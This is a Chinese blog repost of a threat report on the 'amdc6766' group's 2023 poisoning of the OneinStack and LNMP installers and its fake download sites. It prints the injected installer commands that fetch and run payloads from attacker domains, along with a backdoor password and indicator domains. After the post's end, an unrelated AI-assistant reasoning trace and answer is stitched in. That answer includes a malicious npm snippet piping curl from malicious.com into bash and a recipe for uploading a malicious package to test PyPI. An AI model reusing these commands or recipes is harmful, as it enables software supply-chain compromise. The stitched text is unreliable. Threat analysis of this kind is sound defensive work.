一年四起供应链投毒事件的幕后黑手_oneinstack被黑

前言

2017年,黑客入侵Avast服务器,在CCleaner更新中植入恶意代码,被数百万用户下载。

2017年,M.E.Doc遭黑客攻击,篡改更新植入NotPetya,影响全球公司。

2020年,黑客入侵SolarWinds服务器,植入恶意代码影响客户敏感信息,导致美国财政部、商务部等多个政府机构用户受到长期入侵和监视。

以上事件,均由黑客发起的供应链攻击引发。

供应链投毒攻击是指黑客利用供应链中的软件、硬件或服务等环节,通过植入恶意代码或篡改产品,从而影响最终用户的安全的一种攻击手段。当今世界依赖于数字网络连接,个人和企业都通过网络进行交流。攻击者可以通过攻击目标公司使用的第三方服务提供商,利用其服务或软硬件作为入口点进入目标网络。然后,通过供应链将风险扩大到其他企业和用户,造成巨大的影响。

概述

2023年4月,深信服安全运营中心(MSS)安服应急响应团队和深信服深瞻情报实验室发现了一起供应链投毒攻击事件,目标是PHP/JAVA部署工具OneinStack。同月,深瞻情报实验室还发现LNMP供应链投毒事件,随后在9月和10月又发现两起供应链投毒事件,分别涉及LNMP和Oneinstack。根据该团伙常用C2服务器特征,高度怀疑这四起供应链投毒事件均出自一个黑产团伙之手。

经过关联分析,深信服深瞻情报实验室发现四起事件的TTPs存在高度一致性,且溯源分析发现该团伙使用了多个以amdc6766.net结尾的域名实施恶意活动,包括供应链投毒攻击以及动态链接库远控后门。

2023上半年至今,这个黑产组织利用多种攻击手段,包括仿冒页面(AMH、宝塔、Xshell、Navicat)、供应链投毒(LNMP、OneinStack)和公开web漏洞等,有针对性地对运维人员进行攻击。运维人员从仿冒页面或官方平台下载并执行含有恶意代码的部署工具,与攻击者C2服务器建立DNS隧道连接。

该黑产组织通过定向投毒运维部署工具供应链,长期远控低价值主机作为肉鸡,择机选择高价值目标进行深度控制。随后他们会下发Rootkit和代理工具,伺机从事各类黑产活动,给用户造成实际损失。

供应链投毒事件时间线

时间

软件名

被篡改的文件目录

植入恶意代码

2023年4月

OneinStack

oneinstack/include/openssl.sh

wget http://download.cnoneinstack.com/oneinstack.jpg -cO /var/local/oneinstack.jpg \

tar zxf /var/local/oneinstack.jpg -C /var/local/

cd /var/local/cron \

./load linux@QWE

2023年4月

LNMP

lnmp2.0/include/init.sh

wget http://lnmp01.amdc6766.net/lnmp.jpg -cO /var/local/lnmp.jpg \

tar zxf /var/local/lnmp.jpg -C /var/local/

cd /var/local/cron \

./load linux@QWE

2023年9月

LNMP

lnmp2.0/include/init.sh、lnmp.sh

../tools/lnmp.sh  linhkkngf@QWE

2023年10月

OneinStack

/src/pcre-8.45.tar.gz/pcre-8.45/configure

wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null

rm -f /var/local/osk.jpg

/var/local/cron/load linhkkngf@QWE

4月OneinStack供应链投毒事件

2023年4月,PHP/JAVA部署工具OneinStack遭受供应链投毒攻击。攻击者在官方网站下载安装包中植入恶意链接,已发现境内用户受到感染。

在OneinStack官方网站的安装程序中,/usr/local/src/oneinstack/include/openssl.sh被攻击者植入恶意代码。当用户从恶意地址下载oneinstack.jpg后,该文件会解压并执行./cron目录下load。

在load执行后,首先会判断受害主机是否为RedHat服务器。然后,它会从download.cnoneinstack.com下载一系列恶意文件,包括t.jpg,s.jpg,install,cr.jpg,libaudit.so.2等,并将他们解压至/var/local/cron目录下。最后,利用crond实现持久化建立DNS隧道通信。

4月LNMP供****应链投毒事件

2023年4月和9月期间,Linux服务器部署工具LNMP遭受了供应链投毒的攻击。此次事件使用了与上文类似的攻击手法,因此怀疑是同一伙攻击者所为。

在4月LNMP供应链投毒事件中,安装过程中从lnmp01.amdc6766.net下载了lnmp.jpg,解压并执行了包括ba、cr、libxml.2.so.2.9.2等恶意文件。

9月LNMP供应链投毒事件

9月同样出现了LNMP供应链投毒事件。攻击者在lnmp2.0/include/init.sh中植入了恶意代码,并在tools目录下植入恶意二进制程序lnmp.sh。

执行lnmp.sh后,首先判断受害主机是否为RedHat服务器,然后从download.lnmp.life下载后阶段cr.jpg、s.jpg、Install、libseaudit.so.2.4.6等恶意文件,并将它们解压到了/var/local/cron目录中。最后,通过crond实现持久建立DNS隧道通信。

10月OneinStack供应链投毒事件

2023年10月6日,Oneinstack官方镜像网站的最新安装包再次被投毒。这次投毒行为是通过植入恶意代码到oneinstack/src/pcre-8.45/configure文件实施的。攻击者从download.oneinstack.club下载了osk.jpg,解压并执行了./cron目录下load。

load执行后,首先判断受害主机是否为RedHat服务器,然后从download.oneinstack.club下载后阶段t.jpg,s.jpg,install,cr.jpg,libstdc++.so.2.0.0等恶意文件,并将它们解压至/var/local/cron。最后,通过crond实现持久建立DNS隧道通信。

四起事件,指向同一个幕后真凶!

2023年10月,深信服XDR监测到某用户主机crond被替换加载了/libxm2.so.2.9.2等远控后门,同时发现sshd程序的动态链接库劫持/lib64/linux-x86-64.so.2,记录了ssh密码并设置了后门密码360bss3200189。

随后的监控发现了异常DNS定时请求,怀疑主机上可能还存在其他的守护进程。通过对主机的调查,发现这些DNS请求是由Rootkit内核线程发起的。

攻击者可以通过这些DNS请求下发控制命令。例如获取系统版本信息、执行命令、获取文件、执行socks5代理工具等。

此次攻击事件的完整攻击流程,如下图:

通过此次攻击事件的分析,发现与上半年监测到的多起供应链投毒事件存在较高的TTPs相似性,原因如下:

1.攻击套件参数和伪装手段一致

本次攻击者最初攻击套件中的install和src.jpg,install执行命令参数为linux@QWE,使用jpg后缀作为tar包的伪装,其攻击手法与OneinStack供应链投毒事件中的初始攻击套件一致。

2.使用crond服务持久化和后门动态链接库

本次攻击者下发/usr/sbin/crond+/usr/lib/libxm2.so.2.9.2动态链接库劫持,作为远控后门,建立DNS隧道连接。

OneinStack供应链事件中后续下载的crond、libaudit.so.2等恶意文件,同样是利用crond服务动态链接库劫持,建立DNS隧道连接,进行持久化。

1703843569_658e96f16446c3fa93f56.png!small?1703843570273

3.相同的域名amdc6766.net和攻击手法

内网某台主机存在后门程序/usr/lib/libxm2.so.2.9.2,其外连域名为aliyun.amdc6766.net。

在4月份的LNMP供应链投毒事件中,LNMP的安装过程中,从恶意域名lnmp01.amdc6766.net下载了lnmp.jpg文件。随后,该文件被解压并执行了ba、cr、libxml.2.so.2.9.2等恶意文件。该事件中的域名结构、恶意文件命名结构、攻击手法与上述事件高度相似。

由此可以推断“amdc6766”团伙与这次异常定时DNS请求攻击事件高度相关。四起供应链投毒事件的核心攻击手法相同:

  • 恶意文件伪装为jpg

  • 加载器的参数相似linux@QWE或linhkkngf@QWE

  • install执行参数相同linux@QWE

  • 利用crond服务实现持久化

  • 执行crond程序加载恶意动态链接库

  • 建立DNS隧道连接

不讲武德,仿冒网站后投毒

经过深信服深瞻情报实验室对可疑域名amdc6766.net的关联分析,获得以下子域名。据了解,该域名常用于供应链投毒攻击以及动态链接库远控后门,因此内部将该团伙命名为代号“amdc6766”黑产组织。

域名

攻击活动

yum.amdc6766.net

远控后门外连域名

aliyun.amdc6766.net

远控后门外连域名

long.amdc6766.net

远控后门外连域名

baidu.amdc6766.net

远控后门外连域名

microsoft.amdc6766.net

远控后门外连域名

xshell.amdc6766.net

xshell供应链投毒攻击

navicat.amdc6766.net

navicat供应链投毒攻击

navicat02.amdc6766.net

navicat供应链投毒攻击

download.amdc6766.net

xshell供应链投毒攻击

lnmp01.amdc6766.net

LNMP供应链投毒攻击

今年4月,监测发现可疑xiandazm.com域名仿冒AMH面板官网。

仿冒页面中的AMH面板部署脚本已被替换为恶意链接。该安装脚本中注入恶意代码从down.amh.jpg下载amh.jpg,提供linux@QWE执行load,后续阶段与供应链投毒攻击无异。

根据恶意文件和网空特征关联到多个仿冒运维部署工具的网站。

可疑域名

攻击活动

域名注册时间

xiandazm.com

AMH面板仿冒页面

2023-03-06 08:02:55

cqdtwxx.com

AMH面板仿冒页面

2016-12-23 07:45:26

linhunq.com

Navicat仿冒页面

2023-02-08 06:28:09

www.navicatcn.net

Navicat仿冒页面

2023-01-13 07:56:59

cnxshell.com

Xshell仿冒页面

2023-03-06 08:02:55

cnlnmp.com

LNMP仿冒页面

2023-01-09 09:32:48

bixwinner.cc

恶意Xshell下载地址

2023-03-25 08:01:25

biosoft.cc

恶意LNMP下载地址

2023-03-07 09:17:44

lightsoft.cc

恶意宝塔面板下载地址

2023-03-23 07:41:04

highthost.cc

恶意Xshell下载地址

2023-03-25 08:01:24

lukesoft.cc

恶意Navicat下载地址

2023-03-07 09:17:44

amhplus.cc

恶意AMH面板下载地址

2023-05-01 09:10:29

download.amh.tw

恶意AMH面板下载地址

/

“amdc6766”黑产组织长期以来一直利用仿冒页面、供应链投毒及公开web漏洞等攻击方式,针对运维人员常用软件Navicat、Xshell、LNMP、AMH、OneinStack、宝塔等开展定向攻击活动。经过前期潜伏发现高价值目标后,他们会采取持久化手段,例如植入动态链接库、Rootkit、恶意crond服务等,控制受感染的主机,伺机发起各类黑产攻击活动。

思考:如何防范供应链攻击

对于防范供应链攻击而言,难点在于,攻击者只需找到软件供应链的一个弱点,就能轻松入侵并造成危害。然而,防守方企业需要对整个供应链上下游进行全面的安全防护。由于供应链的复杂性,追溯和清除攻击痕迹都是十分困难的,而这对大多数企业来说既不可行又不现实。因此,企业的重点应该是进一步提升自身的安全防护能力和意识,即使上下游供应链遭到黑客入侵,也能确保自身数据的安全。

在此,我们提醒您:

  • 验证软件来源:在部署新的运维工具或更新时,确保从官方可信赖的渠道获取软件,避免使用来路不明的软件包。

  • 签名验证:对于软件包和更新,验证数字签名以确保其完整性和真实性,避免被篡改的恶意软件。

  • 安全审计:定期对运维工具和软件进行安全审计,及时发现潜在的安全隐患和恶意代码。

  • 供应商信任:与可信赖的供应商建立长期合作关系,了解其安全实践和供应链管理措施。

题外话

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
侵权,请联系删除。

<think>好的,用户之前询问了关于在电脑启动时植入shellcode的可能性,现在他们又转向供应链攻击,想知道这是怎么实现的。我需要先理解供应链攻击的基本概念,然后结合他们之前的兴趣点来构建回答。 首先,用户可能对系统底层安全感兴趣,比如启动过程的安全机制,现在想了解更广泛的攻击方式。供应链攻击属于更高级、更隐蔽的攻击手段,可能涉及多个环节,我需要用他们能理解的例子来解释。 供应链攻击的实现方式包括污染软件依赖、篡改硬件设备、入侵开发环境等。需要具体说明每个步骤,比如攻击者如何渗透到开发环节,如何注入恶意代码,以及这些代码如何传播到最终用户。可能还需要提到一些著名案例,比如SolarWinds事件,让用户有更直观的认识。 用户可能还想知道这种攻击的危害性和防御方法,所以在回答中需要涵盖这些方面。考虑到他们之前的问题涉及启动过程,可以关联供应链攻击如何绕过Secure Boot等安全机制,比如通过签名的恶意软件更新。 另外,要确保回答结构清晰,分点说明,使用技术术语但不过于复杂。可能需要使用代码示例或图表来辅助解释,比如如何劫持npm包或篡改固件更新。同时,提醒用户注意供应链安全的重要性,尤其是开发者和企业如何防范此类攻击。 最后,用户可能有学习或研究的目的,所以可以推荐一些进一步学习的资源或实践方法,比如安全审计工具或参加CTF比赛中的相关挑战。需要保持语气专业但易于理解,避免过于技术化,确保信息准确可靠。</think>### 供应链攻击深度解析 --- #### 一、攻击本质 **通过渗透产品/服务生产流程中的任意环节**,将恶意代码注入合法渠道,形成**"官方带毒"传播链**。攻击目标包括: - 软件开发工具链(编译器、依赖库) - 硬件制造流程(芯片烧录、固件更新) - 物流运输环节(植入硬件后门) - 软件分发渠道(应用商店、镜像源) --- #### 二、典型攻击路径(技术实现) ##### 1. 软件供应链污染 ```mermaid graph LR A[攻击者入侵代码仓库] --> B{污染依赖项} B -->|npm包劫持| C[自动更新传播] B -->|PyPI投毒| D[开发者本地环境感染] C & D --> E[用户安装"合法"软件] ``` **具体实现**: - **依赖库劫持**(如`event-stream`事件): ```javascript // 恶意npm包伪代码 module.exports = function(){ require('child_process').exec('curl http://malicious.com/exploit.sh | bash') } ``` - **开发工具链污染**(如XcodeGhost): ```bash # 篡改Xcode编译流程 /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/clang -malicious_flag ``` ##### 2. 硬件供应链攻击 ```python # 模拟UEFI固件更新植入后门(需物理接触产线) def flash_firmware(image): original = read_rom() backdoor = generate_malicious_module() infected_image = original.replace(b"ACPI_TABLE", backdoor + b"ACPI_TABLE") write_to_spi_flash(infected_image) ``` ##### 3. 更新劫持(如SolarWinds攻击) ```powershell # 恶意更新包执行流程 $updateFile = Download-Update -Url "https://official-update.com/v3.2.1" $signature = Verify-Signature -File $updateFile # 合法数字签名 iex ($updateFile | Extract-MaliciousDLL) ``` --- #### 三、技术突破点 | 攻击阶段 | 利用技术 | 典型案例 | |------------------|-----------------------------------|--------------------------| | 开发环境 | CI/CD配置泄露 | Codecov Bash Uploader | | 编译过程 | 编译器后门(可执行文件污染) | Ken Thompson经典论文实例 | | 软件分发 | 镜像源劫持(APT/Yum源投毒) | 某Linux发行版镜像被篡改 | | 硬件生产 | 固件签名密钥泄露 | 某品牌服务器植入BMC后门 | --- #### 四、防御技术对抗 ##### 1. 软件成分分析(SCA) ```bash # 使用Syft扫描容器镜像成分 syft alpine:latest -o json | jq '.artifacts[] | select(.name == "malicious-pkg")' ``` ##### 2. 硬件可信验证 ```text Intel SGX远程认证流程: 1. 生成硬件Quote → 2. 发送至IAS服务 → 3. 验证TEE环境完整性 ``` ##### 3. 分布式验证策略 ```go // TUF框架元数据签名验证示例 func VerifyUpdate(meta Metadata) bool { rootKeys := LoadTrustedRootKeys() return meta.Signatures.Verify(rootKeys) && HashMatch(meta.Targets["app.exe"], repo.Targets["app.exe"]) } ``` --- #### 五、攻击检测难点 1. **信任链污染**:恶意代码携带合法数字签名 ```powershell # 验证微软签名但实际为恶意驱动 Get-AuthenticodeSignature "C:\drivers\evil.sys" | Where Status -eq "Valid" ``` 2. **潜伏周期长**:SolarWinds攻击潜伏期达**14个月** 3. **跨环节渗透**:某次攻击同时污染了: - Jenkins构建服务器 - SonarQube代码分析平台 - 内部PyPI私有仓库 --- #### 六、企业级防护方案 **分层防御架构**: ```text 1. 硬件层:TPM 2.0 + Secure Boot 2. 构建层:隔离的Air-Gapped编译环境 3. 交付层:基于Sigstore的透明日志签名 4. 运行时:eBPF实时监控异常行为 ``` **关键工具链**: - **Grafeas**:元数据审计系统 - **in-toto**:供应链链路验证框架 - **SPDX**:软件物料清单标准 --- #### 七、研究实验建议 1. **模拟攻击实验**: ```bash # 创建恶意Python包实验 poetry new demo-pkg echo "import os; os.system('calc.exe')" > demo-pkg/__init__.py twine upload --repository-url https://test.pypi.org/legacy/ dist/* ``` 2. **防御实践**: ```dockerfile # 安全基础镜像构建 FROM scratch COPY --from=gcr.io/distroless/base / / ADD --chown=nonroot:nonroot app /app USER nonroot ``` --- ### 总结 供应链攻击本质是**信任传递体系的瓦解**,其技术实现高度依赖对生产流程的深度渗透。现代防御需要建立**零信任供应链体系**,通过**自动化审计+多方验证+最小化依赖**来构建深度防御。对于开发者而言,永远不要盲目信任`pip install`或`npm install`的输出结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值